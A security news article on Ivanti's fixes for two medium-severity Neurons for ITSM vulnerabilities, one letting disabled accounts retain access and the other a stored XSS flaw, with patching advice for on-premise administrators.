Ivanti patches two Neurons for ITSM flaws that can preserve access or expose session data
3 min. read 
Published on
Ivanti has released security fixes for two medium-severity vulnerabilities in Ivanti Neurons for ITSM, its IT service management platform. The issues, tracked as CVE-2026-4913 and CVE-2026-4914, affect versions before 2025.4 and could let an authenticated attacker keep access after account disablement or pull limited data from other users’ sessions.
The first flaw, CVE-2026-4913, is an improper protection of an alternate path issue. Ivanti says a remote authenticated attacker could retain access even after an administrator disables the account, which makes the bug especially relevant for offboarding, privilege revocation, and insider-risk scenarios.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
The second flaw, CVE-2026-4914, is a stored cross-site scripting bug. Ivanti says it allows a remote authenticated attacker to obtain limited information from other user sessions, and user interaction is required for exploitation.
What is affected and what needs action
Both CVEs affect Ivanti N-ITSM before version 2025.4. Ivanti says on-premise customers should update to version 2025.4 through the Ivanti License System, while cloud customers do not need to take action because the fix was already applied to all cloud environments on December 12, 2025.
Ivanti also says it is not aware of active exploitation of either vulnerability at the time of disclosure. That lowers the immediate alarm level, but it does not change the need to patch on-premise deployments because both flaws require only low privileges and affect core session trust and access control.
From a risk perspective, CVE-2026-4913 may worry defenders more because it touches account disablement, which many organizations treat as a hard security boundary. CVE-2026-4914 is less severe on paper, but it can still expose session-linked information if a user opens malicious stored content. This last sentence is an inference based on the CNA descriptions and CVSS vectors.
Severity and impact at a glance
| CVE | Issue type | Severity | Main impact | User interaction |
|---|---|---|---|---|
| CVE-2026-4913 | Improper protection of alternate path | Medium 5.7 | Disabled account may retain access | Required |
| CVE-2026-4914 | Stored XSS | Medium 5.4 | Limited information exposure from other user sessions | Required |
Source: Ivanti CNA data in NVD.
What admins should do now
- Upgrade on-premise Ivanti Neurons for ITSM systems to version 2025.4.
- Confirm whether any recently disabled accounts still show post-disable activity. This is a practical response based on the nature of CVE-2026-4913.
- Review stored content, custom fields, and user-generated inputs that could surface in other sessions. This follows from the stored XSS behavior described for CVE-2026-4914.
- Keep cloud environments on the radar, but note that Ivanti says hosted instances already received the fix in December 2025.
- Watch for Ivanti follow-up guidance in case the company publishes additional detection or support notes.
FAQ
By score, CVE-2026-4913 is slightly more severe at 5.7 versus 5.4 for CVE-2026-4914. It can let an authenticated attacker keep access after an account has been disabled.
Ivanti says cloud customers do not need to take action because it already applied the fix to all cloud environments on December 12, 2025.
Yes. Ivanti says on-premise customers should update to version 2025.4 through the Ivanti License System.
Ivanti says it is not aware of active exploitation of either vulnerability at disclosure time.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages